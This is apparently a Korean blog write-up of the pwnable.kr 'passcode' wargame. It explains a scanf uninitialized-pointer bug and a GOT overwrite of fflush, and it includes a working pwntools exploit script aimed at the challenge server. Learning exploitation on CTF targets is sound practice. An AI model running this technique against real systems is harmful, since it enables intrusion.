[Toddle]passcode

🌇│System_Study/🪙│Pwnable.kr

[Toddle]passcode

Jastes 2022. 11. 19. 21:08

passcode_WriteUp

보시면.. 엄마가 패스 기반의 로그인 시스템을 만들라고 해서 컴파일 할때는 문제가 없었어요
물론 컴파일하는데 오류가 좀 뜨는데 그걸 누가 신경쓰겠어요.. 라고 합니다.

파일을 받아서 열어보니까..

위 코드를 살펴보면 정수를 입력받는데 주소의 명시(&)가 되지 않았습니다.
그럼 입력받았을 때 입력값이 아닌 해당 위치의 값이 읽어드린다는 사실을 알 수 있습니다.

보호기법을 보니까.. 하 RTL과 같은 공격기법을 해야할거 같습니다.
또한 NX가 걸려있기에 외부의 정보는 못 불러오겠군요

Exploit design

그럼 welcome과 login은 한 번 살펴봅시다. (참고로 위치한 주소는 아래에서 확인함)

C코드가 있으니까 보면서 인자를 확인하면 name이라는 0x70 passcode는 0x10이죠

그럼 저희는 위 코드를 보고 메모리 구조가 대략 어떻게 되어있는지 추론이 가능합니다.

welcome func stack frame	esp	welcome func syscall
- name[100] -	ebp(ebp-0x70)	-
welcome sfp - ret	-	welcome func end
login func stack frame	esp	login func syscall
- passcode1, passcode2 -	ebp(ebp-0x10 & 0xc)	-
login func sfp - ret	-	login func end
main func stack frame	-	main func syscall
main sfp - ret	-	main func end

그리고 스택의 esp가 welcome(0x88)과 login(0x28)의 차이가 0x60(96)으로
차이가 0x4(4)만큼 차이가 생깁니다. 왜 저렇게 계산해서 저렇게 나왔냐.. 그럼 gdb로 확인하면

그럼 우리는 이 두 이미지를 통해 확인할 수 있습니다

Welcome stack frame

dummy(24byte)	esp(0xffffce10)
name buff(100byte)	start(0xffffce28)
dummy(12byte)	ebp(0xffffce98)

의 위치와 login도 확인을 하면..

ebp의 주소가 같다는 점을 알 수 있으며(당연히 바로 불러왔으니까.. 그럴 가능성이 높겠죠?)
또한 해당 esp가 welcome의 ebp의 주소에 포함되어 있습니다 상세하게 봅시다.

보시면 scanf에 passcode가 들어가는데 밑에 disass을 보시면 edx-0x10에 들어가네요
그러면 종합하여 메모리 구조를 구상해보면..

login stack frame

dummy(24byte)	esp(0xffffce70)
passcode1(4byte)	esp(0xffffce88)
passcode2(4byte)	start(0xffffce8c)
dummy(12byte)	ebp(0xffffce98)

위 코드가 매우 중요한 취약점의 코드입니다. 또한 메인함수에서 welcome과 login 함수가
실행되는데 메모리의 구조를 비교하면 name[95-99]까지 공유된다는 점
그리고 scanf에서 & 라는 인자를 안 넣으므로써 해당 주소의 값이 입력되는 점

그럼 if조건을 맞춰야겠죠(NX걸려있어요) 다른 공격기법도 될거 같은데 이렇게 해봅시다.

NOP(0x90)*0x60(96byte) + fflush_got(4byte) + system_addr(4byte)

로 구성할 수 있습니다. pwntool를 활용하여 payload를 작성해봅시다.

위에 이미지를 보시면 어떻게 주소를 찾았는지 확인 할 수 있습니다.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22 from pwn import *
 
'''defalut setting'''
context(arch='i386', os='linux', endian='little')
e = ELF('./passcode')
s = ssh('passcode', 'pwnable.kr', 2222, 'guest')
p = s.process('./passcode')
 
''' using function address'''
fflush_got = e.got['fflush']
get_flag = 0x080485e3
 
'''payload composition'''
payload = b'A'*96
payload += p32(fflush_got)
 
payload2 = str(int(get_flag))
 
p.sendline(payload)
p.sendline(payload2)
 
p.interactive()
Colored by Color Scripter cs

코드의 구성은 앞에서 다 설명했으므로 넘어가겠습니다.

id 명령어가 안됬는데 결과는 나오는 무슨.. 생각해보니까 s.process에 위치를
해당 저희 로컬 위치가 아니라 거기 위치로 잡아야될거 같네요

거기에 flag가 존재하니까요 근데 이번엔 그냥 넘어갈께요 어짜피 된거니까

참고 자료

참고 이미지

저작자표시 비영리 변경금지